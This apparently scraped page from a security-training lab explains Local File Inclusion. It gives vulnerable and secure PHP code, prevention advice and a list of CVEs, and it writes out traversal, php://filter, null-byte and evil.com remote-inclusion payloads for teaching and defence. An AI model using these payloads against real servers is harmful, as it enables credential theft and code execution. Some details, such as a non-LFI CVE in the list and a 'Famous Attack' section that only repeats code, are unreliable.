Local File Inclusion (LFI)

Local File Inclusion (LFI) is a critical vulnerability arising from insecure use of file inclusion mechanisms in web applications. Attackers can manipulate user inputs to access sensitive files on the server and execute remote code.

CRITICAL SEVERITYOWASP Top 10 #1CWE-985 Techniques

🧪 Interactive LFI Lab

Select an LFI technique and practice file inclusion attacks in a safe environment

Select LFI Attack Type

Choose an attack technique to practice different LFI vectors

📁

Basic LFI

Simple file inclusion without any filtering or protection

Beginner1 attacks

🔄

Directory Traversal

Use path traversal sequences to access files outside the web root

Intermediate1 attacks

⚡

Null Byte Injection

Bypass file extension restrictions using null bytes

Advanced1 attacks

🔓

Filter Bypass

Bypass common LFI filters and protections

Expert1 attacks

🌐

Remote File Inclusion

Include files from remote servers

Expert1 attacks

📖

Quick Reference

Always available while working

⚠️Notable LFI CVEs (2024-2025)

CVE-2024-238979.8

Jenkins - Arbitrary file read via path traversal in CLI command parser

→ Remote code execution & credential theft

CVE-2024-45779.8

PHP CGI - Argument injection leading to LFI/RCE

→ Complete system compromise

CVE-2024-273488.8

Apache HugeGraph - Path traversal in file upload

→ Arbitrary file access & data exfiltration

CVE-2024-63878.1

OpenSSH - RegreSSHion RCE vulnerability

→ Unauthenticated remote code execution

🔥OWASP Top 10

Position:#1

Path Traversal is part of OWASP Top 10 2021 #1 (Broken Access Control). Critical level in 25% of applications.

📊Critical Statistics

Vulnerable Web Applications:~25%

Average CVSS Score:8.5

Usually rated as HIGH or CRITICAL

RCE Risk:CRITICAL

Can lead to remote code execution

🛡️Quick Prevention

✓Use allowlists for file paths (whitelist only)
✓Sanitize and validate all user inputs
✓Resolve path using realpath() and check base directory
✓Disable dangerous PHP functions (allow_url_include)
✓Implement proper file permissions and access controls
✓Use security headers and disable directory listing

📚Resources

VulnSign Path Traversal

📚 Learn & Master LFI

Comprehensive guide covering theory, bypass techniques, real-world examples, and defense strategies

FUNDAMENTALS

📁

What is Local File Inclusion (LFI)?

Local File Inclusion (LFI) is a vulnerability that allows attackers to include and execute files from the local file system. This occurs when applications dynamically include files based on user input without proper validation, potentially exposing sensitive data or enabling remote code execution.

MECHANISM

⚡

How It Works

When an application includes files based on user input without validation, attackers can manipulate the path to access arbitrary files. Common targets include /etc/passwd, configuration files, log files, and even achieving RCE through log poisoning or PHP wrappers.

❌ Vulnerable Code

php

// Vulnerable PHP code
<?php
$page = $_GET['page'];
include("/var/www/pages/" . $page);
?>

// Attacker payload:
// ?page=../../../../etc/passwd
// ?page=php://filter/convert.base64-encode/resource=config.php

✅ Secure Code

php

// Secure PHP code
<?php
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';

if (in_array($page, $allowed)) {
    include("/var/www/pages/{$page}.php");
} else {
    include("/var/www/pages/error.php");
}
?>

TYPES

📂

Types of File Inclusion

📁 Basic LFI

Simple file inclusion without any filtering or protection

?file=/etc/passwd

🔀 Directory Traversal

Use path traversal sequences to access files outside the web root

?file=../../etc/passwd

🔓 Null Byte Injection

Bypass file extension restrictions using null bytes

?file=../../etc/passwd%00

🌐 Remote File Inclusion

Include files from remote servers

?file=http://evil.com/shell.txt

IMPACT

💥

What Can Happen?

🔴Sensitive Data Exposure: Access to /etc/passwd, database configs, API keys, and credentials
🟠Source Code Disclosure: Read application source code, revealing business logic and additional vulnerabilities
🟡Remote Code Execution: Through log poisoning, PHP wrappers, or session file manipulation
🔴Complete System Compromise: Full server takeover via RCE and privilege escalation

BEST PRACTICES

🛡️

How to Prevent LFI

✓Use Allowlists: Whitelist only allowed file names/paths, never rely on blocklists
✓Input Validation: Sanitize and validate all user input, reject path traversal sequences
✓Use realpath(): Resolve the real path and verify it's within allowed directory
✓Disable PHP Functions: Set allow_url_include=Off, disable file_get_contents on URLs
✓Principle of Least Privilege: Run web server with minimal file system permissions
✓Monitor & Log: Log file access attempts, monitor for suspicious patterns

REAL WORLD

🎯

Famous Attack

// Vulnerable PHP code <?php $page = $_GET['page']; include("/var/www/pages/" . $page); ?> // Attacker payload: // ?page=../../../../etc/passwd // ?page=php://filter/convert.base64-encode/resource=config.php

// Secure PHP code <?php $allowed = ['home', 'about', 'contact']; $page = $_GET['page'] ?? 'home'; if (in_array($page, $allowed)) { include("/var/www/pages/{$page}.php"); } else { include("/var/www/pages/error.php"); } ?>